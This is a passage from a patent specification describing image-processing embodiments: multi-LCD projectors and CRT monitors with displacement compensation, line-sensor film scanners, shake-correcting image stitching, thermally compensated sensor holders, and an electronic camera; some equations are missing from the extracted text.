signals read from the memory 142 tothe D/A converter 145; and the pixel signals read from the memory 143 to the D/A converter 147. The D/A converters 146, 144, and 147 convert the input signals to three analog image data items, which are supplied to the LCDs 129, 130, and 131. Driven bythese analog data items, the LCDs display three images, respectively. A light source 147 applies light to the LCD 130, and a light source 148 applies light to the LCDs 129 and 131. Hence, three beams bearing the images displayed by the LCDs 129, 130,and 131, respectively, are applied to the screen 127 through the half prism 128 and the quartz filter 132. As a result, the three images are combined on the screen 127 into a single image. Because of the LCDs used, the seventeenth embodiment can be a projector which can project a high-resolution image on a screen. Since the interpolation circuits 134, 135, and 136 and the S,R memory 133 cooperate to compensate for thedisplacements of the LCDs 129, 130, and 131, it is unnecessary to position the LDCs with high precision. In addition, since the multipliers 137, 138, and 139 multiply the pixel signals which represent the overlap regions of three images to be projectedon the screen 127 by the weighting coefficients, the overlap regions are not conspicuous. Further, the quartz filter 132 prevents the images of the individual LCD pixels from being projected onto the screen 127, increasing the quality of the imageformed on the screen 127. Three other quartz filters may be used, each for one LCD. With reference to FIG. 60, it will now be explained how to detect the displacement of the LCDs 129, 130, and 131. As FIG. 60 shows, a displacement-detecting mirror 149 is interposed between a lens 6 and the quartz filter 132. The mirror 149 is inclined so as to receive the images projected from the LCDs 129, 130, and 131 and reflect them to a CCD 150through a focusing lens 156. Hence, three images identical to those projected onto the screen 127 can be focused on the light-receiving surface of the CCD 150. To detect the displacement of the LCDs 129, 130, and 131, three reference data items representing three reference images which are greatly correlated and not displaced at all (S=R=0) are input to the interpolation circuits 134, 135, and 136,respectively. The circuits 134, 135, and 136 do not process the input data items at all, and the multipliers 141, 142, and 143 multiply these data items by a weighting coefficient of "1." At first, the first data item is supplied to the LCD 129, which displays the first reference image. The mirror 149 reflects the first reference image, and the lens 156 focuses it on the CCD 150. The CCD 150 converts the first reference imageinto analog signals, and an A/D converter 151 converts the analog signals to digital data. The digital data is stored into a memory 153 through a switch 152 whose movable contact is connected to the fixed contact a which in turn is connected to thememory 153. Next, the second data item is supplied to the LCD 130, which displays the second reference image. The second reference image is focused on the CCD 150 in the same way as the first reference image. The second reference image is converted intoanalog signals and hence to digital data, in the same way as the first reference image. In the meantime, the movable contact of the switch 152 is moved and connected to the fixed contact b which is connected to a memory 154. As a result, the digitaldata representing the second reference image is stored into the memory 154. The data items stored in the memories 153 and 154 are read to an S,R detector 155. The detector 155 detects the displacement of the second reference image with respect to thefirst reference image, and produces data representing the displacement. The displacement data is stored into an S,R memory 133. Then, the third data item is supplied to the LCD 130, which displays the third reference image. The third reference image is focused on the CCD 150 in the same way as the first reference image. The third reference image is converted into analogsignals and hence to digital data, in the same way as the first reference image. Meanwhile, the movable contact of the switch 152 is moved and connected to the fixed contact a which is connected to the memory 153, and the digital data representing thethird reference image is stored into the memory 153. The data items stored in the memories 153 and 154 are read to the S,R detector 155. The detector 155 detects the displacement of the third reference image with respect to the second reference image,and produces data representing the displacement. The displacement data is stored into the S,R memory 133. Hence, with the projector it is possible to detect the displacements of the LCDs 129, 130, and 131. To obtain the three reference data items, use may be made of a reference image similar to the one used in the eleventh embodiment (FIGS. 42A,42B, 43C). The mirror 149, which is used to detect the displacements of the LCDs 129, 130, and 131, may be replaced by a half mirror 156 as is shown in FIG. 61. In this case, the reference image displayed by each LCD is projected onto the screen 127, andthe light reflected from the screen 127 is applied to the half mirror 156, which reflects the light to the CCD 150. Alternatively, a camera may be used exclusively for detecting the displacements of the LCDs 129, 130, and 131. The present invention can be applied to a CRT monitor of the structure shown in FIG. 62. As FIG. 62 shows, the CRT monitor comprises interpolation circuits 161 to 165, electron guns 186 to 190, a phosphor screen 193, and a spatial filter 194. The electron guns 186 to 190 emit electron beams to the screen 193, thereby forming parts of an image. The interpolation circuits 161 to 165 process the data items representing the image parts. As a result, the image parts will be moved linearly androtated on the screen 193, compensating the displacements of the electron guns with respect to their desired positions, and forming an image having no discontinuity. The spatial filter 194 is a low-pass filter such as a quartz filter. Since a plurality of electron guns are used, the distance between the phosphor screen 193 and the beam-emitting section is shorter than in the case where only one electron gun is used. The electron guns 186 to 190 may be replaced by, forexample, lasers or a unit comprising LEDs (having a lens) and micro-machine mirrors. The distortion of image, caused by electromagnetic deflection, may be eliminated by means of the interpolation circuits 161 to 165. The intervals of the scanning lines, which have changed due to the image distortion, may be utilized to set acutoff frequency for the spatial filter 194. Further, when lasers are used in place of the electron guns, spatial filters may be located in front of the lasers, respectively. A film-editing apparatus, which is an eighteenth embodiment of the invention and which incorporates line sensors, will be described with reference to FIG. 63 and FIGS. 64A to 64E. The film-editing apparatus comprises a loading mechanism 402, a light source 403, a focusing lens 404, an imaging section 405, a drive circuit 407, an image-synthesizing circuit 408, a display 409, a memory 410, and a printer 411. When driven by the circuit 407, the loading mechanism 402 rewinds film 401. The light source 403 is located opposite to the focusing lens 404, for applying light to the lens 404 through the film 401. The lens 404 focuses the image recorded onthe film 401 on the light-receiving surface of the imaging section 405. The section 405 converts the input image into image signals, which are amplified by preamplifiers 10a, 10b, and 10c. The amplified signals are supplied to A/D converters 14a, 14b,and 14c and converted thereby to digital signals. The signal processors 20a, 20b, and 20c perform .gamma. correction and edge emphasis on the digital signals. The digital signals, thus processed, are stored into frame memories 22a, 22b, and 22c. The image signals read from the frame memories 22a, 22b, and 22c are input to the image-synthesizing circuit 408. The circuit 408, which has a structure similar to that of FIG. 55, processes the input signals, generating three data itemsrepresenting a red (R) image, a green (G) image, and a blue (B) image. These image data items are output to the display 409, the memory 410, and the printer 411. The imaging section 405 has the structure shown in FIG. 64A. That is, it comprises threeline sensors 406a, 406b, and 406c. As is evident from FIG. 64C, each line sensor is equipped with an optical RGB filter. The film-editing apparatus is characterized in that the line sensors detect images while the film 401 is fed, passing through the gap between the light source 403 and the focusing lens 404, and that the images thus read from the film 401 arecombined into a single image. To be more specific, the images A, B, and C which the line sensors 406a, 406, and 406c receive as is shown in FIG. 64B, are combined into a single image which corresponds to one-frame image on the film 401. The images A,B, and C are displaced with respect to one another since the line sensors cannot and are not positioned with precision. Nevertheless, the mutual displacement will be compensated in the film-editing apparatus by means of the technique described above. The line sensors 406a, 406, and 406c are much more inexpensive than area sensors. Hence, the film-editing apparatus can accomplish high-resolution photographing at a very low cost. If the film 401 is a color one, the apparatus can easilyproduce color image signals. More line sensors may be used, arranged in staggered fashion, as is shown in FIG. 64D. In this case, the images detected by the sensors are positioned as is illustrated in FIG. 64E. The film-editing apparatus can be modified in various ways. For example, not the film 401, but the light source 403, the lens 404, and the imaging section 405 may be moved together parallel to the film, thereby to read images from the film 401. Further, each line sensor-RGB filter unit may be replaced by an RGB line sensor which is designed for RGB photography. Still further, the RGB filter (FIG. 64C) may be replaced by a rotating color filter. An image processing apparatus according to a nineteenth embodiment of the invention will be described with reference to FIGS. 65A and 65B. This embodiment uses CMDs and requires no frame memories whatever for assisting interpolation. The nineteenth embodiment can perform random access and nondestructive read. The random access is to read the values of a pixel at any given position. The nondestructive read is to read pixel signals as many times as desired, without losingsignal charges, up until the pixel signals are reset. Due to the nondestructive read it is possible to use each CMD as a sort of a memory, at least for a relatively short period of time. Utilizing the random access and the nondestructive read, interpolation can be executed without using frame memories. More precisely, pixel values required for achieving interpolation are read by the random access from the CMDs which are used inplace frame memories. As FIG. 65A shows, the image processing apparatus comprises, among other components, CMD drivers 32a and 32b, a system controller 33, and an analog interpolation section 415. The CMD drivers 32a and 32b are independently controlled by the system controller 33. They are identical in structure, comprising an address generator 412, an x-decoder 413, and a y-decoder 414 as shown in FIG. 65B. The address generator 412generates addresses, which are supplied to the x-decoder 413 and the y-decoder 414, respectively. In accordance with the input addresses the decoders 413 and 414 produce pulse signals representing the position of a designated pixel. The pulse signalsproduced by the CMD driver 32a are supplied to a CMD 8, whereas the pulse signals produced by the CMD driver 32b are supplied to a CMD 9. The analog interpolation section 415 comprises a coefficient generator 416, a multiplier 417, an adder 418, a sample-hold circuit 419, and a switch 420. The switch 420 connects the output of the sample-hold circuit 419 to either the ground orthe adder 418. The interpolation, which is a characterizing feature of the nineteenth embodiment, will be explained. The interpolation performed in this embodiment is similar to that one which is effected in the first embodiment (FIG. 6). As shown in FIGS. 5Aand 5B, the signal representing a pixel d.sub.ij (i=1 to u, j=1 to w) is read from the CMD 8, converted to a digital signal, processed, and written into a frame memory 30 at a specified address thereof. In the meantime, a pixel d.sub.ij (i=u+1 to u+v,j=1 to w), the four signals representing four pixels located around a pixel d.sub.ij (i=u+1 to u+v, j=1 to w) are read from the CMD 9 by means of random access and nondestructive read. The analog interpolation section 415 executes analog operationdefined by the equation (9) on the four pixel signals. The pixel signals thus processed are converted to digital signals, which are subjected to edge-emphasis and then written into the frame memory 30 at specified addresses thereof. The same pixelsignal can be repeatedly read from the CMD 9, as many times as desired, since it is not destroyed at all whenever read from the CMD 9. Every time a pixel value is calculated by virtue of analog interpolation, the switch 420 connects the output of the sample-hold circuit 419 to the ground, thereby resetting the circuit 419 to "0." Alternatively, the switch 420 may connect thecircuit 419 to the ground only when the value for the first of the four pixels is calculated, and connect the circuit 419 to the adder 418 when the values for the second to fourth pixels are calculated. The image processing apparatus shown in FIGS. 65A and 65B can combine a plurality of images into one, without using frame memories equivalent to the memories 22 and 23 which are indispensable to the first embodiment (FIG. 6). The apparatus can,therefore, be manufactured at low cost. The displacements of the CMD 8 and 9 can be measured in the same method as in the first embodiment. The coefficients output by the coefficient generator 416 may be those selected from several typical coefficient sets prepared. If so, thegenerator 416 can be a small-scale circuit. The PS converter 29 may be replaced by an image-synthesizing circuit of the type illustrated in FIG. 38. Another image processing (image-reproducing) apparatus, which is a twentieth embodiment of this invention, will be described with reference to FIG. 66. To read images from photographic film by a plurality of line sensors at high speed, so thatthese images are fast combined and recorded, it is usually necessary to shorten the exposure time of each line sensor. To this end, the amount of light applied to the film must be increased. The light amount can be increased by using a high-power lightsource, but such a light source has a great size and and consumes much electric power. In the twentieth embodiment, use is made of a special illumination unit. As shown in FIG. 66, the illumination unit comprises a light source 403, a concave mirror 421, a cylindrical lens 422. The source 403 emits light, the mirror 421 applies the light to the cylindrical lens 422. The lens 422 converts the inputlight into three converged beams. The beams, which are intense and have an elongated cross-section, are applied to photographic film 401, illuminating only those three portions of the film 401 which oppose the line sensors of the imaging section 405. Hence, image data can be fast input, without using a high-power, large light source. An image processing apparatus according to a twenty-first embodiment of the invention will be described, with reference to FIGS. 67 and 68, FIGS. 69A to 69D, FIGS. 70A to 70D, FIG. 71, FIGS. 72A and 72B, FIG. 73, and FIGS. 74A and 74B. As FIGS. 74A and 74B show, this apparatus comprises two major sections, i.e., a imaging section A and an recording section B. The section A is designed to form an image of an object, and the section B to record or store the image formed by thesection A. The image signals data by the imaging section A are transmitted to the recording section B, in the form of optical signals. In the imaging section A, the image 201 of an object is supplied through an imaging lens system 202, reflected by a mirror 203a, and focused on a CCD 204 (i.e., an imaging device). The mirror 203a is connected at one edge to a shaft 203b and canbe rotate around the shaft 230b by means of a drive mechanism (not shown) To take the image of the object, the drive mechanism intermittently rotates the mirror 203a in the direction of the arrow shown in FIG. 67, whereby the imaging area of the section A shifts over the object as shown in FIGS. 69A to 69D or FIGS. 70Ato 70D. As a result, the imaging section A can photograph the object in a wide view. The drive mechanism rotates the mirror 203a intermittently at such timing that any two consecutive frame images overlap at least in part. The mirror 203a may berotated manually, in which case the drive mechanism can be dispensed with. The light reflected by the mirror 203a is input to the CCD 204. The CCD 204 converts the light into an image signal, which is supplied to an A/D converter 205. The converter 205 converts the signal into digital image data. The data isdigitized by a digitizer 206 by the know method and then compressed by a data-compressing circuit 207. The data is digitized and compressed. As a result, the digital image data is reduced so much that it can be transmitted, in the form of opticalsignals, from the imaging section A to the recording section B within a short time. However, the data may be damaged while being transmitted, due to the ambient light. To avoid such transmission errors, a circuit 208 adds error-correction codes to thecompressed image data by Reed-Solomon method or a similar method. The image data, now containing the error-correction codes, is modulated by a modulator 209 and then supplied to an LED driver 210. In accordance with the input image data, the LED driver210 drives an LED 211, which emits optical signals 212. At the recording section B, a light-receiving diode 213 receives the optical signals 212 transmitted from the imaging section A. The signals 212 are demodulated by a demodulator 214, which produces digital image data. The data is input to anerror-correcting circuit 215. The circuit 215 eliminates errors, if any, in the data, with reference to the error-correction codes contained in the image data. The image data, thus corrected, is supplied to a data-decoding circuit 216. The correctedimage data is temporarily stored in a frame memory A 217. As indicated above, the mirror 203a is intermittently rotated, thereby shifting the imaging area of the section A intermittently and, thus, photographing the object repeatedly to form a wide-view image thereof. The imaging section A may shakeduring the interval between any two photographing steps since it it held by hand. If this happen, the resultant frame images of the object may be displaced from one another so much that a mere combination of them cannot make a high-resolution image ofthe object. To form a high-resolution image, the image data is read from the memory A 217 and input to a shake-correcting circuit 218. The circuit 218, which will be later described in detail, processes the image data, reducing the displacements of theframe images, which have been caused by the shaking of the section A. The data output from the circuit 218 is stored into a frame memory B 219. The first frame image data (representing the image photographed first) is not processed by the shake-correcting circuit 218 and stored into the frame memory B 219. The circuit 218 processes the second frame image data et seq., converting theseframe image data items represent frame images which are connected to the first frame image. These data items are also stored into the frame memory B 219. Every pixel of the regions, over which the frame images overlap one another, is represented by the average of the values of the pixels defining all frame images, whereby a noise-reduced, high-quality single image will be obtained. The image data items read from the frame memory B 219 are supplied to a D/A converter 220 and converted to analog image data. The analog data is input to a CRT monitor 221, which displays the image represented by these data items. Alternatively, the image data items read from the memory B 219 are supplied to a printer 222, which prints the image. Still alternatively, the image data are input to a filing device 223 to enrich a data base. With reference to FIG. 68, the shake-correcting circuit 218 will now be described in detail. Also it will be explained how the circuit 213 operates to correct the displacement of, for example, the Nth frame image, which has resulting from theshake of the imaging section A. The shake-correcting circuit 218 comprises two main components. One is a distance-measuring section 218a for measuring the distances the Nth frame image is displaced from the two adjacent frame images, the (N-1)th frame image and the (N+1)thframe image. The other is an image-moving section 218b for moving one adjacent frame image in parallel and rotating the other adjacent frame, so that the (N-1)th, Nth and (N+1)th frame images may be connected appropriately. The imaging area of the section A shifts over the object, while tilting in one direction and the other, as is illustrated in FIGS. 70A to 70D. Hence, the image of the object appears as if moving and rotating. The displacement of one frame imagewith respect to the next one can, therefore, be represented by a motion vector. The motion vector changes from a frame image to another, because it includes a component corresponding to the rotation of the frame image. The distance-measuring section 218a determines the motion vectors at two or more points in the common region of two adjacent frame images, thereby to measure the distance and the angle the second frame image is displaced and rotated with withrespect to the second frame image. The distance and the angle, thus measured, are supplied to the image-moving section 218b. In accordance with the distance and the angle, the section 218b converts the image data item showing the second frame image toa data item which represents a frame image assuming a proper position with respect to the first frame image. As a result, the two adjacent frame images are connected in a desirable manner. It will be explained how the distance-measuring section 218a measures the distance and the angle the second frame image is displaced and rotated with with respect to the second frame image. First, part of the data item representing the (N-1)thframe image is read from the frame memory A 217 and stored into a reference memory 232. Each frame image has a size of 16.times.16 pixels in this instance. To detect the positional relation between the (N-1)th frame image and the Nth frame image, thetwo frame images are correlated. To be more specific, the data stored in the reference memory 232, which represents a portion of the (N-1)th frame image (hereinafter called "reference image"), is compared with the data representing that portion of theNth frame image (hereinafter called "comparative image") which assumes the same position as said portion of the (N-1)th frame image and which is larger than said portion of the (N-1)th frame image. Next, as shown in FIG. 71, the reference image is moved to various positions over the comparative image, by means of an overlap-region position controller 240. While the reference image remains at each position, the value of every pixel of thereference image is compared with the value of the corresponding pixel of the comparative image. The absolute values of the differences between all pixels of the reference image, on the one hand, and the corresponding pixels of the comparative image, onthe other, are added together under the control of an addition controller 241. The sum of the absolute values of said differences is thereby obtained. Then, the sums of absolute difference values, which have been obtained when the reference image stays at the various positions over the comparative image, are compared with one another. The position at which said sum of absolute differencevalues is the minimum is thereby determined. The displacement which the reference image at this very position has with respect to the comparative image is regarded as a motion vector. The signal output by the overlap-region position controller 240 and the signal produced by the adding controller 241 are input to a pixel-position calculator 233. One of the pixels of the Nth frame image stored in the frame memory A 217 isthereby designated. The value of this pixel is supplied to one input of a difference calculator 234. Meanwhile, the signal output by the adding controller 241 designates one of the pixels of the (N-1)th frame image stored in the reference memory 232,and the value of the pixel thus designated is supplied to the other input of the difference calculator 234. The difference calculator 234 calculates the difference between the input pixel values. The difference is input to an absolute value calculator 235, which obtains the absolute value of the difference. The absolute value is supplied to an adder236. The adder 236 adds the input absolute value to the absolute difference value stored in a sum memory 237. Ultimately, the sum memory 237 stores the sum of 256 differences for the 16.times.16 pixels stored in the reference memory 237, under thecontrol of the adding controller 241. This sum is input to a minimum value calculator 238 and used as a correlation signal representing the size of the overlap region of the (N-1)th frame image and the Nth frame image. The overlap region of two frame images is shifted under the control of the overlap-region position controller 240, and the correlation signal obtained while the overlap region remains at each position is input to the minimum value calculator 238. The calculator 238 determines the position where the correlation signal has the minimum magnitude. The displacement of the Nth frame image with respect to the (N-1)th frame image is input, as a motion vector v, to a .DELTA.x.DELTA.y.DELTA..theta. calculator 239. Assume that the correlation between the reference image and the comparative image is most prominent when the reference image is located at the position (-x, -y), as is illustrated in FIG. 71. Then, the motion vector v is (x, y). The motionvectors are accumulated in a memory (not shown), whereby the motion vector is obtained which indicates the position the Nth frame image has with respect to the first frame image. Motion vectors of this type are obtained for at least two given points aand b in the Nth frame image. The two motion vectors are input to the .DELTA.x.DELTA.y.DELTA..theta. calculator 239. The calculator 239 calculates two motion vectors for the points a and b, i.e., v1(x1, y1) and v2(x2, y2). The .DELTA.x.DELTA.y.DELTA..theta. calculator 239 calculates, from the vectors v1 and v2, the position at which to write the Nth frame image (now stored in the frame memory A 217) in the frame memory B 219. This position is defined by theparallel motion distances (.DELTA.x and .DELTA.y) and counterclockwise rotation angle .DELTA..theta. of the Nth frame image. How the calculator 239 calculates the position will be explained with reference to FIGS. 72A and 72B. As can be understood from FIG. 72A, a motion vector v can be considered one synthesized from two vectors S and r which pertain to the parallel motion and rotation of a frame image. The motion vector v is evaluated in units of one-pixel width. Nonetheless, it can be evaluated more minutely by interpolating a correction value from the correlations among the pixels, as is disclosed in Published Unexamined Japanese Patent Application 4-96405. Namely: Therefore, the vector S and the vector r are: The components of the vector S are .DELTA.x and .DELTA.y. As evident from FIG. 72B, The value for .DELTA..theta. can be given approximately as: The distances of parallel motion and the angle of rotation can be obtained more accurately by using not only the motion vectors for the points a and b, but also the motion vectors for many other points. The parallel motion distances .DELTA.x and .DELTA.y and the rotation angle .DELTA..theta. are input to the image-moving section 218b. The circuit 218b processes the image data showing the Nth frame image in accordance with the distances.DELTA.x and .DELTA.y and the angle .DELTA..theta., thereby moving the Nth frame image linearly and rotating it. The image data item showing the Nth frame image thus moved and rotated is written into the frame memory B 219. It suffices to set thecenter of rotation of the Nth frame image at the mid point between the points a and b. If motion vectors are calculated for three or more points, the center of rotation may be set in accordance with the positions of those points. Since the pixel positions are discrete, each pixel of the Nth frame image, moved and rotated, usually does not assume the same position as the corresponding position in the frame memory B 219. For this reason, instead of the signal representingthe pixel, the signal representing an adjacent pixel which takes the position most similar to that position in the memory B 218 may be written at said position in the memory B 219. Alternatively, a pixel value interpolated from the values of some pixelswhich assume positions similar to that position in the memory B 219 may be stored at the position in the memory B 219. (The method utilizing interpolation is preferable since it may serve to form a high-quality image.) If any pixel of the Nth frame image is identical to one pixel of the (N-1)th frame image, whose value is already stored in the frame memory B219, its value is not written into the memory B 219. Rather, its value and the value of the identicalpixel are added, in a predetermined ratio, and the resultant sum is stored into the memory B 219. This method helps enhance the quality of an output image. The optimal value for the predetermined ratio depends on how many times the same pixel iswritten into the frame memory B 219. In the twenty-first embodiment, the imaging area of the section A can be switched rather roughly, and a simple means such as a polygonal mirror can be used to control the optical system for switching the imaging area. Further, the imagingsection A can operate well even while held by hand because its shake is compensated well. FIGS. 74A and 74B illustrate how the apparatus according to the twenty-first embodiment is used. The imaging section A can be held by hand as shown in FIG. 74A since its shake is compensated. The imaging section A and the recording section FIG.74B need not be connected by a cable and can therefore be located far from each other. This is because, as is shown in FIGS. 74A and 74B, the section A can transmit signals to the recording section B, in the form of infrared rays or radio waves. Theimaging section A can be small and light and can therefore be manipulated easily. An image processing apparatus, which is a twenty-second embodiment of this invention, will be described with reference to FIG. 75. FIG. 75 shows only the components which characterize this embodiment. Except for these components, thetwenty-second embodiment is identical to the twenty-first embodiment. The twenty-second embodiment has an optical system designed exclusively for detecting the shake of an image. In operation, an image 265 of an object is applied through a lens system 266 to a mirror 267a. The mirror 267 reflects the image to a half mirror 268. The half mirror 268 reflects the image and applies it to an imaging device 269 which is aline sensor. The imaging device 269 converts the image into image data, which is supplied to a CRT or a printer (neither shown) so that the image may be displayed or printed. Meanwhile, the input image is applied through the half mirror 268 and amagnifying system 270 to an imaging device 271. As a result, the image is magnified and focused on the imaging device 271. The device 271 converts the image into image data from which a shake, if any, of the image will be detected. Since the image focused on the imaging device 271 has been magnified by the magnifying system 270, the motion vectors pertaining to the pixels forming the image can be detected in high resolution. Hence, the parallel motion distances .DELTA.xand .DELTA.y and the rotation angle .DELTA..theta., i.e., the factors required in reconstructing the image, can be calculated more accurately than in the twenty-first embodiment. As a result, the reconstructed image will have higher quality. Inaddition, the imaging device 269, which is a line sensor, can read the input image at high speed, that is, can read many pixels per unit of time. In the twenty-first embodiment and the twenty-second embodiment, the displacement of an image with respect to the next image taken is detected from the positional correlation between the two images. If the images are low-contrast ones, however,the results of the correlation calculation are inevitably great. With reference to FIGS. 76A and 76B, an image processing apparatus will be described which can calculate the correction with sufficient accuracy and which is a twenty-third embodiment of the present invention. As FIG. 76A shows, two highly correlative objects are placed above and below an object of photography. The "highly correlative" objects have broad bands in the nyquist frequency range, such as two-dimensional chirp waves, random-dot patternsdefined by random numbers, white-noise amplified patterns, or dot-image patterns. Alternatively, as shown in FIG. 76B, characters and lines may be drawn on the upper and lower edge of the image of an object. For example, an image located near a dot-image pattern is used a reference image in calculating the correlation. In this case, the apparatus can calculate the correlation with very high accuracy. An image processing apparatus according to a twenty-fourth embodiment will be described with reference to FIGS. 77 to 79, FIGS. 80A to 82C, and FIGS. 81 to 83. This embodiment can increase the accuracy of the correlation calculation withoutusing highly correlative patterns of the types utilized in the twenty-third embodiment. The embodiment is identical to the twenty-first embodiment (FIG. 67), except that a correlated area selector is incorporated in a shake-correcting circuit 218 of thetype shown in FIG. 68, so that a highly correlative area is selected. Hence, FIG. 77 shows only the components which characterize the twenty-third embodiment. In operation, the image data output from a frame memory A 217 is input to a distance calculator 218a, an image-moving section 218b, and a correlated area selector 218c. The circuit 218c selects the most highly correlative part of the inputimage, and input data representing a reference image to a distance-measuring section 218a, which will be described later. From the two input images the distance-measuring section 218a measures the displacement of one of the images with respect to the other image. The displacement, thus measured, is supplied to the circuit 218b, which moves and rotates the firstimage, thus positioning the first image such that the first image is properly connected to the second image. FIG. 78 shows, in detail, the correlated area selector 218c. As is evident from FIG. 78, in the selector 218c, an image is selected from among, for example, n possible images a.sub.1 to a.sub.n and one of possible images b.sub.1 to b.sub.n shownin FIG. 79, in accordance with the input image data, and dispersion-detecting circuits 243 and 244 detect the dispersion values .sigma.a.sub.i and .sigma.b.sub.i for the selected images a.sub.i and b.sub.j. The sum .sigma.i of these dispersion values issupplied to a maximum value calculator 245. The calculator 245 outputs value i.sub.max which renders the sum .sigma..sub.i maximal. The value i.sub.max is supplied to a correlated area reading circuit 246. The circuit 246 reads two reference imagesi.sub.max and i.sub.max, which are input to the distance-measuring section 218a. Hence, the two images compared have high contrast, and the correlation calculation can therefore be performed with high accuracy. The dispersion-detecting circuits 243 and 244 can be of various types. For example, they may be a high-pass filter or a band-pass filters. Alternatively, they may be a convolution filter having such coefficients as is shown in FIGS. 80A-80C. Further, the circuits 243 and 244 may be of the type shown in FIG. 81, wherein use is made of the sum of the value differences among adjacent pixels. An image processing apparatus, designed to form a high-resolution image or a wide image, has a plurality of imaging devices. The holders holding the imaging devices may expand or contract as their temperature changes with the ambient temperatureor with an increase and decrease of the heat they generate. In such an event the relative positions of the devices will alter, making it difficult to provide a high-quality image. To prevent the devices from changing their relative positions, theholders are usually made of material having a small thermal expansion coefficient. Generally, such material is expensive and hard to process. The manufacturing cost of the image processing apparatus is inevitably high. In the present invention, a technique may be applied in the imaging section to avoid changes in the relative positions of the imaging devices, without using material having a small thermal expansion coefficient. Two examples of the techniquewill be described with reference to FIG. 82 and FIG. 83. In the example of FIG. 82, a beam splitter 282 for splitting input light into two parts is secured to a holder 283, which in turn is fastened to one end of a base 281. An L-shaped holder 285 holding an imaging device 284a (e.g., a CCD), and aholder 286 holding an imaging device 284b are fastened to the base 281, such that the devices 284a and 284b are so positioned as to receive the two light beams output from the beam splitter 282 and convert them into electric signals. In other words, theimaging devices 284a and 284b are set in planes conjugate to that of the semitransparent mirror of the beam splitter 282. At the other end of the base 281 an optical system 287 is located. A rotary filter 288 is arranged between the beam splitter 282and the optical system 287. The first imaging device 284a is spaced apart from the semitransparent mirror of the beam splitter 282 for a distance n. The second imaging device 284b is spaced apart from the semitransparent mirror for a distance m. The distance m is equal tothe distance n, that is, m=n. The light-receiving surface of the first device 284a is spaced in vertical direction from the top of the base 281 by a distance q. The screw fastening the holder 286 to the base 281 has a play p. The play p is far less thandistance q, that is, p<q. Generally, material having an extremely small thermal expansion coefficient is chosen for the holders 285 and 286 holding the devices 284a and 284b, respectively, in order to prevent displacement of one imaging device with respect to the otherwhen the holders 285 and 286 experience temperature changes. Such material is expensive and, to make matters worse, has poor processibility, and should better not be used. The materials in common use have thermal expansion coefficients differing over abroad range. In the present example shown in FIG. 82, a material having a large thermal expansion coefficient is also positively used, ultimately reducing the manufacturing cost of the image processing apparatus. More specifically, two different materialsare selected for the holders 285 and 286, respectively, to satisfy the following equation: where .alpha. and .beta. are the thermal expansion coefficients of the materials, respectively, p is the play p of the screw, and q is the distance q between the base 281 and the device 284a. Hence, even if the holders 285 and 286 undergo temperature changes, the distances m and n remain equal to each other, whereby the imaging devices 284a and 284b are maintained, each at the same position relative to the other as before. Stated inanother way, they are always in planes conjugate to that of the semitransparent mirror of the beam splitter 282. In the example of FIG. 83, the imaging devices 284a and 284b are moved not only along the axis of the optical system 287, but also in a line extending at right angles to the axis of the system 287. More precisely, the positions of the holders286 and 289 and holding the first imaging device 284a and the second imaging device 284b, respectively, are reversed as compared to the first example (FIG. 82). Suppose that the holder 286 is heated and expands in the direction a, and the holder 289holding the device 284a is also heated and its vertical and horizontal portions expand in the direction a and the direction b, respectively. As a result, the device 284b held by this holder 286 moves in the direction a, while the imaging device 284aheld by the holder 289 moves in the direction b. If the displacement of the device 284a in the direction b is equal to that of the device 284b in the direction a, the relative positions of the devices 284a and 284b remain unchanged. As clearlyunderstood from the equation of p.times..alpha.=and q.times..beta., .alpha.>.beta.. To keep the devices 284a and 284b at the same relative positions, the following equation must be satisfied: where r is the vertical distance between the base 281 and the axis of the imaging device 284b, and S is the horizontal distance between the axis of the imaging device 284a and the axis of the screw fastening the holder 289 to the base 281. As evident from FIG. 83, r<S, and hence .alpha.>.beta.. Therefore, only if r and S have values which satisfy the equation of p.times..alpha.=q.times..beta., then the two following equations hold simultaneously: In other words, since the components take the positions specified in FIG. 83, not only the displacement of either imaging device along the axis of the optical system 287, but also the displacement thereof in a line extending at right angles tothe axis of the system 287. In either example it is possible to prevent changes in the relative positions of the imaging devices placed in planes conjugate to the semitransparent mirror of the beam splitter 282 merely by selecting two materials having different thermalexpansion coefficients for the holders supporting the imaging devices 284a and 284b, respectively. Neither holder needs to be made of material having a small thermal expansion coefficient, which is expensive and has but low processibility. Assume that the materials of the holders have difference thermal expansion coefficients which are known. Then, those portions of the holders to which the devices 284a and 284b are attached may have lengths determined in accordance with the knownthermal expansion coefficients. In this case as well, the relative positions of the devices can be prevented from changing even if the holders experience temperature changes. According to the present invention, the components of the imaging section need not be made of materials having a very small thermal expansion coefficient to avoid changes in the relative positions of the imaging devices. Rather, they are made ofmaterials having different large thermal expansion coefficients. They can yet prevent changes in the relative positions of the imaging devices, because they have the sizes as specified above and are located at the positions described above. An electronic camera, which is a twenty-fifth embodiment of the invention, will now be described with reference to FIGS. 84 and 85. In the twenty-first embodiment shown in FIG. 67, the mirror 203a is arranged between the imaging lens system 202 and the imaging device 204 (i.e., the CCD). Hence, the wider the input image, the greater the aberration of the image, the greaterthe reduction in ambient light. The twenty-fifth embodiment, or the electronic camera is characterized in that, as shown in FIG. 84, a mirror 203a is provided between an object and an imaging lens system 202. The electronic camera comprises a CMD 204a having 2048.times.256 pixels which are arranged in rows and columns as is illustrated in FIG. 85. The CMD 204a has a clock pulse generator 204-1, a horizontal scanning circuit 204-2, and a verticalscanning circuit 204-3. It should be noted that the rows of pixels, each consisting of 2048 pixels, extend perpendicular to the plane of FIG. 85. The CMD 204a is of XY-address read type. When the clock pulse generator 204-1 supplies read pulses to the horizontal scanning circuit 204-2 and the vertical scanning circuit 204-3, pixel signals are output from the signal terminal SIG. As FIG. 84 shows, the electronic camera further comprises a stroboscopic lamp 291, polarizing filters 292 and 293, a voice coil 290, a processing section 294, a shutter-release button 299, and a memory card 297. The lamp 291 emits flashing lightto illuminate an object of photography. The polarizing filters 292 and 293 are positioned with their polarizing axes crossing at right angles. The voice coil 290 is used to rotate the mirror 203a. The processing section 294 processes the pixel signalsoutput by the CMD 204a. The memory card 297 is connected to the section 294, for storing the image data produced by the CMD 204a. The processing section 294 has the structure shown in FIG. 86. It comprises an A/D converter 205, a digitizer 206, an image-synthesizing circuit 295, a data-compressing circuit 207, a data-writing circuit 296, and a controller 298. The A/Dconverter 205 converts the analog pixel signals supplied from the CMD 204a to digital pixel signals. The digitizer 206 converts the digital pixel signals to binary image signals. The circuit 295 combines the image signals into image data representing asingle image. The circuit 207 compresses the image data by a specific method. The circuit 296 writes the compressed image data into the memory card 297. The controller 298 controls all other components of the processing section 294, the voice coil290, and the stroboscopic lamp 291, every time it receives a signal generated when a photographer pushes the shutter-release button 299. The 